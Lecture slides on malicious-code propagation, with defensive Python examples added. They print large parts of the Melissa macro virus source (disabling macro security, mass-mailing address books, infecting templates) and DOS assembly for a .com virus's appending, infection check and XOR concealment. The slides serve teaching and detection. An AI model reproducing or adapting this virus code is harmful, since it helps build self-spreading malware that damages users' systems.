Propagation of malicious code
"Malicious" indicates the potential to do damage.
Malicious code is usually classified by its type of propagation.
It is sometimes classified by the platforms and mechanisms it requires in order to run, e.g. macro viruses.
A virus, Trojan or worm may not actually cause any damage.
Slide 3
Viruses
A program or piece of code that reproduces itself, and sometimes performs a particular action as well.
Definition from RFC 1135: "A virus is a piece of code that inserts itself into a host, including operating systems, to propagate. It cannot run independently. It requires that its host program be run to activate it."
Slide 4
Worm
A worm is similar to a virus, but it does not reproduce locally; it propagates between systems only.
Definition from RFC 1135: "A worm is a program that can run independently, will consume the resources of its host from within in order to maintain itself and can propagate a complete working version of itself on to other machines."
Slide 5
Macro Virus
Sometimes considered worms.
Requires a host program to process/run it in order for it to execute.
Often written in VBA (Visual Basic for Applications) for Word, Access, Excel, PowerPoint, Outlook, etc.
E.g. Melissa.
Slide 6
Trojan Horses
Code disguised as a benign program, but behaving in an unexpected, usually malicious manner.
The user needs to be convinced to accept/run it.
E.g. the Pokemon worm, which displays animated pictures of a bouncing Pikachu on your screen while it e-mails itself to everyone in your address book and prepares to delete every file.
Slide 7
The Trojan horse initially appears as an e-mail with the title "Pikachu Pokemon" and the English message "Pikachu is your friend."
The above picture is what users see when executing pokemon.exe (its attachment). What they don't see is the application e-mailing itself and deleting files from the system.
Slide 8
Anatomy of a Virus
Two primary components: the propagation mechanism and the payload.
Propagation: the method by which the virus spreads itself.
Old days: a single PC, transferred to other hosts by way of floppy diskettes.
Nowadays: the Internet.
Slide 9
Types of Propagation
Parasitic: propagates by being a parasite on other files, attaching itself in some manner that still leaves the original file usable. E.g. the .com and .exe files of MS-DOS.
Macro virus.
Boot sector infectors: copy themselves to the bootable portion of the hard (or floppy) disk. The virus gains control when the system is booted.
Slide 10
Normal boot procedure
The machine first goes through its usual POST (Power On Self Test).
The BIOS (Basic Input/Output System) then does what is referred to as the bootstrap: checking for a valid bootable disk.
For a hard drive to be bootable, it must contain a Master Boot Record (MBR): a chunk of code that lies at the beginning of the hard drive and understands the partition table.
Slide 11
The MBR code looks for a particular partition that is marked bootable (MS-DOS fdisk: "active"), and then transfers control to the code found there. This code is known as the boot sector.
Viruses have two opportunities to take control.
1. Insert themselves into the MBR position. They can gain control under all situations, at the expense of having to deal with reading and booting via the partition table.
Slide 12
2. Insert themselves into the boot sector of a partition.
Boot sector viruses tend to take the existing MBR or boot sector code, relocate it elsewhere, and then insert themselves into the record. When the system boots, they can do their thing and then transfer control to the relocated code that they replaced.
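To make the MBR layout concrete, here is an added example (not part of the lecture) that parses a 512-byte MBR the way the BIOS bootstrap does: it checks the 0x55AA boot signature, walks the four 16-byte partition entries, finds the one flagged active (0x80) and reports where the boot sector lives. It also hashes only the 446-byte code region, which is the part a boot-sector virus replaces; a changed hash with an unchanged partition table is the signature a defender looks for. The MBR image is constructed inline for the example and is not a dump of a real disk.

```python
import hashlib
import struct

SECTOR_SIZE = 512
MBR_SIGNATURE = b"\x55\xaa"   # last two bytes of a valid MBR
BOOTABLE_FLAG = 0x80          # "active" in MS-DOS fdisk terms
ENTRY_FMT = "<B3sB3sII"       # status, CHS start, type, CHS end, LBA start, sector count


def build_sample_mbr():
    """Constructed 512-byte MBR for this example (not a real disk image).
    446 bytes stand in for the bootstrap code; two partition entries follow,
    the second one marked active."""
    code = b"\xfa\x33\xc0" + b"\x90" * 443          # 446 bytes of stand-in code
    entry1 = struct.pack(ENTRY_FMT, 0x00, b"\0\0\0", 0x83, b"\0\0\0", 2048, 409600)
    entry2 = struct.pack(ENTRY_FMT, BOOTABLE_FLAG, b"\0\0\0", 0x07, b"\0\0\0", 411648, 204800)
    empty = b"\x00" * 16
    return code + entry1 + entry2 + empty + empty + MBR_SIGNATURE


def has_boot_signature(sector):
    return len(sector) == SECTOR_SIZE and sector[510:512] == MBR_SIGNATURE


def parse_mbr(sector):
    """Return the non-empty partition entries as dicts."""
    if not has_boot_signature(sector):
        raise ValueError("not a valid MBR: wrong size or missing 0x55AA signature")
    partitions = []
    for i in range(4):
        raw = sector[446 + 16 * i: 446 + 16 * (i + 1)]
        status, _chs_s, ptype, _chs_e, lba_start, sectors = struct.unpack(ENTRY_FMT, raw)
        if ptype == 0:          # type 0 means "unused entry"
            continue
        partitions.append({"index": i, "active": status == BOOTABLE_FLAG,
                           "type": ptype, "lba_start": lba_start, "sectors": sectors})
    return partitions


def find_boot_sector(sector):
    """LBA of the boot sector the MBR code would jump to; None unless exactly
    one partition is marked active (the situation MBR code expects)."""
    active = [p for p in parse_mbr(sector) if p["active"]]
    return active[0]["lba_start"] if len(active) == 1 else None


def mbr_code_hash(sector):
    """Hash the 446-byte code region only, so legitimate repartitioning
    (which touches the table, not the code) does not raise an alarm."""
    return hashlib.sha256(sector[:446]).hexdigest()


def mbr_code_changed(sector, baseline_hash):
    """True when the bootstrap code differs from the recorded known-good hash."""
    return mbr_code_hash(sector) != baseline_hash


if __name__ == "__main__":
    mbr = build_sample_mbr()
    print("partitions:", parse_mbr(mbr))
    print("boot sector at LBA", find_boot_sector(mbr))
    print("code hash:", mbr_code_hash(mbr))
```

On a real system the sector would come from reading the first 512 bytes of the raw disk device; the baseline hash is taken once from a known-clean state and compared at each boot or scan.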
Slide 13
Multi-partite
Refers to viruses that can use multiple means of infection, such as MBR, boot sector and parasitic.
Slide 14
Payload
Refers to what the virus does (besides propagation) once executed:
do nothing; do cute things; malicious damage, such as deleting your partition table.
Some viruses have a particular trigger, e.g. a date, or a number of successful infections.
Slide 15
Smart viruses usually use an infrequent trigger so that they have ample time to ensure they have properly propagated before alerting the users.
Slide 16
Case Study I: Melissa
Melissa works by infecting the Document_Open() macro of Microsoft Word, so it runs immediately when the user opens the Word file.

    Private Sub Document_Open()
    On Error Resume Next
Slide 17
Disable the macro security features:

    If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
        CommandBars("Macro").Controls("Security...").Enabled = False
        System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
    Else
        p$ = "clone"
        CommandBars("Tools").Controls("Macro").Enabled = False
        Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
    End If
Slide 18
MAPI stands for Messaging API, a way for Windows applications to interface with various e-mail functionalities.
The registry value "Melissa?" is a way to tell if it has already infected the host.

    Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
    Set UngaDasOutlook = CreateObject("Outlook.Application")
    Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
    If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then
Slide 19
Check whether the application is Outlook, then compose a list of the first 50 e-mail addresses from the address book:

        If UngaDasOutlook = "Outlook" Then
            DasMapiName.Logon "profile", "password"
            For y = 1 To DasMapiName.AddressLists.Count
                Set AddyBook = DasMapiName.AddressLists(y)
                x = 1
                Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
                For oo = 1 To AddyBook.AddressEntries.Count
                    Peep = AddyBook.AddressEntries(x)
                    BreakUmOffASlice.Recipients.Add Peep
                    x = x + 1
                    If x > 50 Then oo = AddyBook.AddressEntries.Count
                Next oo
Slide 20
Actually send the e-mails, then wrap up:

                BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
                BreakUmOffASlice.Body = "Here is that document you asked for... don't show anyone else ;-)"
                BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
                BreakUmOffASlice.Send
                Peep = ""
            Next y
            DasMapiName.Logoff
        End If
        p$ = "clone"
        System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
    End If
Slide 21
Check whether the active document and the document template (Normal) are already infected; if not, infect them.
Slide 22
    Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
    Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
    NTCL = NTI1.CodeModule.CountOfLines
    ADCL = ADI1.CodeModule.CountOfLines
    BGN = 2
    If ADI1.Name <> "Melissa" Then
        If ADCL > 0 Then _
            ADI1.CodeModule.DeleteLines 1, ADCL
        Set ToInfect = ADI1
        ADI1.Name = "Melissa"
        DoAD = True
    End If
    If NTI1.Name <> "Melissa" Then
        If NTCL > 0 Then _
            NTI1.CodeModule.DeleteLines 1, NTCL
        Set ToInfect = NTI1
        NTI1.Name = "Melissa"
        DoNT = True
    End If
    If DoNT <> True And DoAD <> True Then GoTo CYA
Slide 23
The remaining code modifies the Document_Open() and Document_Close() procedures of the active document, so that every new document created will run the Melissa worm upon closing or saving, and then saves the current document.
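The Melissa walkthrough above lists the behaviours a macro scanner keys on: an auto-executing handler, tampering with the macro security setting, automating Outlook, walking the address book, attaching the active document, and editing the VBA project itself. The following added example (written for these notes, not part of the lecture or of any product) scores macro source text against those behaviours. The rule weights and the two macro samples are constructed for the example; the suspicious sample only sketches the call pattern and is not working code.

```python
import re

# (name, pattern, weight). Patterns follow the behaviours described in the
# Melissa walkthrough; the weights are this example's own choice.
RULES = [
    ("auto-exec handler",
     re.compile(r"\bSub\s+(Document_Open|Document_Close|AutoOpen|AutoClose)\b", re.I), 2),
    ("error suppression", re.compile(r"On\s+Error\s+Resume\s+Next", re.I), 1),
    ("disables virus protection", re.compile(r"Options\.VirusProtection\s*=", re.I), 4),
    ("edits Office security registry key",
     re.compile(r"PrivateProfileString\([^)]*Office\\[^)]*Security", re.I), 4),
    ("automates Outlook",
     re.compile(r'CreateObject\(\s*"Outlook\.Application"\s*\)', re.I), 3),
    ("enumerates address lists", re.compile(r"\.AddressLists\b|\.AddressEntries\b", re.I), 3),
    ("attaches the active document", re.compile(r"Attachments\.Add\s+ActiveDocument", re.I), 4),
    ("sends mail", re.compile(r"\.Send\b", re.I), 2),
    ("self-modifying VBA project",
     re.compile(r"\.VBProject\.VBComponents|CodeModule\.(DeleteLines|InsertLines|AddFromString)", re.I), 4),
]


def scan_macro(text):
    """Return the total score and the names of the rules that fired."""
    hits = [name for name, pattern, _w in RULES if pattern.search(text)]
    score = sum(w for name, _p, w in RULES if name in hits)
    return {"score": score, "hits": hits}


def verdict(score):
    # Thresholds are this example's own choice, not a published scale.
    if score >= 8:
        return "suspicious"
    if score >= 3:
        return "review"
    return "clean"


# Constructed samples (not the Melissa source): one harmless formatting
# macro and one fragment that exhibits the walkthrough's call pattern.
BENIGN_MACRO = r'''
Sub FormatReport()
    ActiveDocument.Paragraphs(1).Range.Font.Bold = True
    ActiveDocument.Save
End Sub
'''

SUSPICIOUS_MACRO = r'''
Private Sub Document_Open()
On Error Resume Next
Options.VirusProtection = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Set app = CreateObject("Outlook.Application")
Set ns = app.GetNameSpace("MAPI")
Set msg = app.CreateItem(0)
For Each entry In ns.AddressLists(1).AddressEntries
    msg.Recipients.Add entry
Next
msg.Attachments.Add ActiveDocument.FullName
msg.Send
End Sub
'''

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_MACRO), ("suspicious", SUSPICIOUS_MACRO)):
        result = scan_macro(src)
        print(label, verdict(result["score"]), result)
```

Keyword scoring of this kind is cheap and catches the 1999-era pattern directly; its weakness is that each rule matches a literal spelling, so a practitioner would pair it with a scanner that first de-obfuscates string concatenation and Chr() sequences before matching.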
Slide 24
Case Study: .com Virus
A .com virus may be divided into three parts: the replicator, the concealer, and the bomb (payload).
Slide 25
Replicator
Spreads the virus: copies the rest of the code to the end of the file.
[Figure: the uninfected file, followed by the virus code appended to it.]
Slide 26
It copies a small portion of its code (V1) to the beginning of the file, and the second part of itself (V2) to the end of the file.
What do V1 and V2 do? V1 transfers control of the program to V2.
Slide 27
The code to do this is simple. The value of Duh must be changed to reflect the length of the file that is infected: Duh = length of V1 + original size of the infected file + 256 (to account for the start position). E.g. if the file size is 79 and V1 is 6 bytes, Duh = 6 + 79 + 256 = 341.

    JMP FAR PTR Duh                 ; Takes four bytes
    Duh DW V2_Start                 ; Takes two bytes

Another approach:

    DB 11101001b                    ; Code for JMP (2-byte displacement)
    Duh DW V2_Start - OFFSET Duh    ; 2-byte displacement
Slide 28
V2 contains the rest of the code. The last part of V2 copies P1 (the saved original bytes) over V1 in memory and then transfers control to the beginning of the file in memory.

    MOV SI, V2_START    ; V2_START is a LABEL marking where V2 starts
    SUB SI, V1_LENGTH   ; Go back to where P1 is stored
    MOV DI, 0100h       ; All COM files are loaded @ CS:[100h] in memory
    MOV CX, V1_LENGTH   ; Move CX bytes
    REP MOVSB           ; DS:[SI] -> ES:[DI]
    MOV DI, 0100h
    JMP DI
Slide 29
The code assumes that P1 is located just before V2. It also assumes ES equals CS. If these assumptions are false, we can change it accordingly:

    PUSH CS             ; Store CS
    POP ES              ; and move it to ES
                        ; Note: MOV ES, CS is not a valid instruction
    MOV SI, P1_START    ; Move from wherever P1 is stored
    MOV DI, 0100h       ; to CS:[100h]
    MOV CX, V1_LENGTH
    REP MOVSB
    MOV DI, 0100h
    JMP DI
Slide 30
The code first moves CS into ES, then sets the source pointer of MOVSB to where P1 is located. Note that the offset of P1 is 100h higher than its physical file location, as COM files are loaded starting from CS:[100h].
Infecting .EXE files is much more complicated.
Slide 31
Replicator portion
Steps:
1. Find a file to infect.
2. Check if it is already infected.
3. If so, go back to 1.
4. Infect it.
5. If enough files have been infected, quit.
6. Otherwise, go back to 1.
Finding a file to infect: write a directory traversal procedure issuing FINDFIRST and FINDNEXT calls.
Slide 32
Once a file is found, open it and read the first few bytes. If they are the same as the first few bytes of V1, then the file is already infected.
Infection takes the following steps:
1. Change the file attributes to nothing.
2. Save the file date/time stamps.
3. Close the file.
4. Open it again in read/write mode.
5. Save P1 and append it to the end of the file.
6. Copy V1 to the beginning, but change the offset which it JMPs to so it transfers control correctly.
7. Append V2 to the end of the file.
8. Restore the file attributes and date/time.
Slide 33
Sample code to check if the file has already been infected:

    mov ah, 3Fh                     ; Read first three
    mov cx, 3                       ; bytes of the file
    lea dx, [bp+offset buffer]      ; to the buffer
    int 21h
    mov ax, 4202h                   ; SEEK from EOF
    xor cx, cx                      ; DX:CX = offset
    xor dx, dx                      ; Returns filesize
    int 21h                         ; in DX:AX
    sub ax, virus_size + 3
    cmp word ptr [bp+offset buffer+1], ax
    jnz infect_it
    bomb_out:
    mov ah, 3Eh                     ; else close the file
    int 21h                         ; and go find another
Slide 34
Concealer
Conceals the program from notice by the everyday user and the virus scanner. A simple XOR encryption:

    encrypt_val db ?
    decrypt:
    encrypt:
        mov ah, encrypt_val
        mov cx, part_to_encrypt_end - part_to_encrypt_start
        mov si, part_to_encrypt_start
        mov di, si
    xor_loop:
        lodsb               ; DS:[SI] -> AL
        xor al, ah
        stosb               ; AL -> ES:[DI]
        loop xor_loop
        ret
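Both the infection check on the previous slide and the XOR concealer above are useful to a scanner as well, read in reverse. The following added example (written for these notes; it is not part of the lecture or of Dark Angel's guide) applies them as detection logic to a .com image held in memory: it decodes the E9 near-jump at offset 0 and tests whether its displacement equals filesize - virus_size - 3, exactly the arithmetic of the slide, and it tries all 256 single-byte XOR keys to find a known signature hidden under a concealer of the kind shown. The two .com images are constructed inline (a four-byte "exit" program padded with NOPs, and the same program in the V1 / P1 / V2 appended layout with V2 XOR-encoded under key 0x5A); the signature is the encoding of "mov ah, 3Fh / mov cx, 3", the first two instructions of the slide's own check.

```python
JMP_NEAR = 0xE9  # opcode of JMP rel16, the 3-byte jump an appender puts at offset 0

# Known-bad string for this example: "mov ah, 3Fh" (B4 3F) and "mov cx, 3" (B9 03 00).
SIGNATURE = bytes([0xB4, 0x3F, 0xB9, 0x03, 0x00])


def jmp_target(image):
    """File offset a leading JMP rel16 lands on, or None if the file does not start with one."""
    if len(image) < 3 or image[0] != JMP_NEAR:
        return None
    disp = int.from_bytes(image[1:3], "little", signed=True)
    return 3 + disp  # displacement is relative to the byte after the 3-byte JMP


def matches_known_appender(image, virus_size):
    """The slide's check as a scanner test: the word after E9 equals
    filesize - virus_size - 3 when a body of virus_size bytes hangs off the end."""
    if len(image) < 3 or image[0] != JMP_NEAR:
        return False
    disp = int.from_bytes(image[1:3], "little", signed=False)
    return disp == len(image) - virus_size - 3


def find_xor_key(image, signature):
    """Brute-force the single-byte XOR concealer: return (key, offset) of the first
    key under which the signature appears in the decoded image, else None.
    Key 0 covers the unencrypted case."""
    for key in range(256):
        decoded = bytes(b ^ key for b in image)
        off = decoded.find(signature)
        if off != -1:
            return key, off
    return None


def build_samples():
    """Constructed images for the example. Returns (clean, infected_layout, virus_size)."""
    original = bytes([0xB4, 0x4C, 0xCD, 0x21]) + b"\x90" * 75   # mov ah,4Ch / int 21h + NOPs, 79 bytes
    key = 0x5A
    v2_plain = SIGNATURE + b"\x90" * 20                        # stand-in V2 body, 25 bytes
    v2 = bytes(b ^ key for b in v2_plain)                      # as stored: XOR-concealed
    p1 = original[:3]                                          # bytes V1 overwrites
    target = len(original) + len(p1)                           # V2 begins after original + P1
    v1 = bytes([JMP_NEAR]) + (target - 3).to_bytes(2, "little")
    infected = v1 + original[3:] + p1 + v2
    return original, infected, len(v2)


def scan(image, virus_size, signature=SIGNATURE):
    return {
        "entry_jmp_target": jmp_target(image),
        "known_appender": matches_known_appender(image, virus_size),
        "xor_hit": find_xor_key(image, signature),
    }


if __name__ == "__main__":
    clean, infected, size = build_samples()
    print("clean   :", scan(clean, size))
    print("infected:", scan(infected, size))
```

The brute force is cheap because the concealer's key space is one byte; that is the general lesson about this kind of concealer, and the reason later variants moved to longer keys and self-mutating decryptors.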
Slide 35
Bomb
Does all the nasty things to annoy the user. Some possible bombs:
System slowdown: easily handled by trapping an interrupt and causing a delay when it activates.
File deletion.
Message display.
Killing/replacing the partition table or boot sector of the hard drive.
Slide 36
Anti-virus Techniques
Integrity/behavioural checkers.
Use a good OS.
Use a virus scanner on the computer and on the e-mail server.
Do not open e-mail attachments.
Frequent backups.
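The integrity checker named above is the countermeasure that directly addresses step 8 of the infection procedure (restoring the file's attributes and date/time): because a careful infector puts the timestamp back, a checker must compare content hashes recorded in a baseline, not timestamps. The following added example (written for these notes, not part of the lecture) builds such a baseline over a directory, re-checks it, and reports added, removed and modified files, flagging the tell-tale combination of changed content with an unchanged timestamp. The sample files and the simulated growth of prog.com are constructed inside a temporary directory by the demo() function.

```python
import hashlib
import os
import tempfile
from pathlib import Path


def file_record(path):
    st = path.stat()
    return {"sha256": hashlib.sha256(path.read_bytes()).hexdigest(),
            "size": st.st_size, "mtime_ns": st.st_mtime_ns}


def build_baseline(root):
    """Map each file under root (relative path) to its hash, size and mtime."""
    root = Path(root)
    return {str(p.relative_to(root)): file_record(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def check_integrity(root, baseline):
    """Compare the directory against a baseline taken in a known-clean state."""
    current = build_baseline(root)
    report = {"added": sorted(set(current) - set(baseline)),
              "removed": sorted(set(baseline) - set(current)),
              "modified": {}}
    for name in sorted(set(current) & set(baseline)):
        old, new = baseline[name], current[name]
        if old["sha256"] != new["sha256"]:
            report["modified"][name] = {
                "size_delta": new["size"] - old["size"],
                # content changed but the date/time did not: timestamps were put back
                "timestamp_preserved": old["mtime_ns"] == new["mtime_ns"],
            }
    return report


def demo():
    """Constructed scenario: baseline two files, then grow prog.com by 28 bytes
    while restoring its original date/time, and drop in a new file."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "prog.com").write_bytes(b"\xb4\x4c\xcd\x21" + b"\x90" * 75)
        (root / "readme.txt").write_text("constructed sample\n")
        baseline = build_baseline(root)

        target = root / "prog.com"
        before = target.stat()
        grown = b"\xe9\x4f\x00" + target.read_bytes()[3:] + b"\x90" * 28
        target.write_bytes(grown)
        os.utime(target, ns=(before.st_atime_ns, before.st_mtime_ns))  # step 8: restore date/time
        (root / "new.com").write_bytes(b"\xc3")
        return check_integrity(root, baseline)


if __name__ == "__main__":
    print(demo())
```

In practice the baseline must itself be protected (stored off-host or signed), since a virus that can rewrite executables can also rewrite an unprotected hash database.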
Slide 37
References
Kevin L. Poulsen, "Hack Proofing Your Network: Internet Tradecraft", Chapter 14, pp. 383-405.
Dark Angel's Phunky Virus Writing Guide, http://www.sirkussystem.com/virus.html: Introduction, and Installment II: The Replicator.